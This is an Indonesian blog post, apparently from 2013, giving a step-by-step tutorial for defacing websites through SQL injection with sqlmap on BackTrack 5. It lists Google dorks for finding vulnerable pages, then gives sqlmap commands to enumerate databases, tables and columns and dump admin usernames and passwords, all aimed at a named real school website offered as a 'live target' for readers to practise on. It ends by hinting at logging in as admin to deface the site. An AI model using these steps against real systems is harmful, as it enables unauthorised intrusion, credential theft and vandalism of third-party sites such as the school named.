Saturday, February 16, 2013
Tutorial Deface Dengan SQLmap Di BackTrack 5 (With Live Target)
Saturday, February 16, 2013 by tes
Halo para sobat Tenny Technology,
kali ini saya akan menulis tentang Cara Deface Dengan SQL Injection
yang dikenal dengan teknik SQLmap di BackTrack. Tools ini sudah ada di
dalam File .ISO pada BackTrack.
Disini, saya menggunakan BackTrack 5 R3.
Pertama-tama, cari target yang vuln terhadap SQL Injection, berikut ini sedikit dork dari saya :
Disini, saya menggunakan BackTrack 5 R3.
Pertama-tama, cari target yang vuln terhadap SQL Injection, berikut ini sedikit dork dari saya :
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
Dan masih banyak lagi dork bertebaran di Google :D
Dalam Tutorial kali ini, saya akan menggunakan target salah satu Sekolah yang ada di Sidoarjo.
Untuk
mengetahui Website tersebut Vuln atau tidak, silahkan tambahkan tanda ‘
(petik satu) setelah atau sebelum nomor id tersebut, bisa juga dengan
menambahkan tanda - (minus) sebelum nomor id tersebut.
Jika target tersebut Vuln terhadap SQLi, maka akan muncul kira-kira seperti ini :
Jika
sudah mendapatkan target, silahkan buka Terminal, kemudian ketikan
perintah “cd /pentest/database/sqlmap” (tanpa tanda petik) kemudian
Enter.
Kemudian akan muncul seperti ini.
Kemudian untuk mencari nama database, ketikkan “ ./sqlmap.py -uhttp://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5 --dbs” (tanpa tanda petik) kemudian Enter.
Kemudian akan muncul seperti ini :
Disana kita dapat menemukan 2 Database, yaitu information_schema dan sman2sidoarjo_sman2sda
Setelah kita mendapatkan Database tersebut, kita tulis “./sqlmap.py -uhttp://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5 -D namadatabase --tables” (tanpa tanda petik) kemudian Enter.
Setelah itu akan muncul beberapa Tabel.
Kemudian kita mencari Colums dengan cara mengetik “./sqlmap.py -uhttp://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5 -D namadatabase -T namatable --columns” (tanpa tanda petik) kemudian Enter.
Disini kita akan menjumpai beberapa Columns dari Tabel Admin.
Kemudian, untuk mengetahui isi dari Columns tersebut, kita ketikkan “./sqlmap.py -uhttp://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5 -D namadatabase -T namatable --dump” (tanpa tanda petik) kemudian Enter.
Jika sudah mendapatkan User + Pass, pasti Anda tau kan yang harus dilakukan ? :)
Nah, tinggal cari Login Adminnya deh :D
Caranya banyak kok di Google :)
Sekian dulu dari saya, saya ucapkan Terimakasih Banyak :)
Untuk yang ingin belajar SQL Map, silahkan menggunakan live targethttp://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5
NB : GUNAKANLAH DENGAN BIJAK :)
Tags:
Hacking
Subscribe to:
Post Comments (Atom)
2 Responses to “Tutorial Deface Dengan SQLmap Di BackTrack 5 (With Live Target)”
February 16, 2013 at 6:09 PM
Coba Ah.....
comment back
www.green404.blogspot.com
February 16, 2013 at 7:15 PM
wew kebetulan nih ane pke backtrack
coba dulu ahh :D
http://greenz-blogger.blogspot.com/
Post a Comment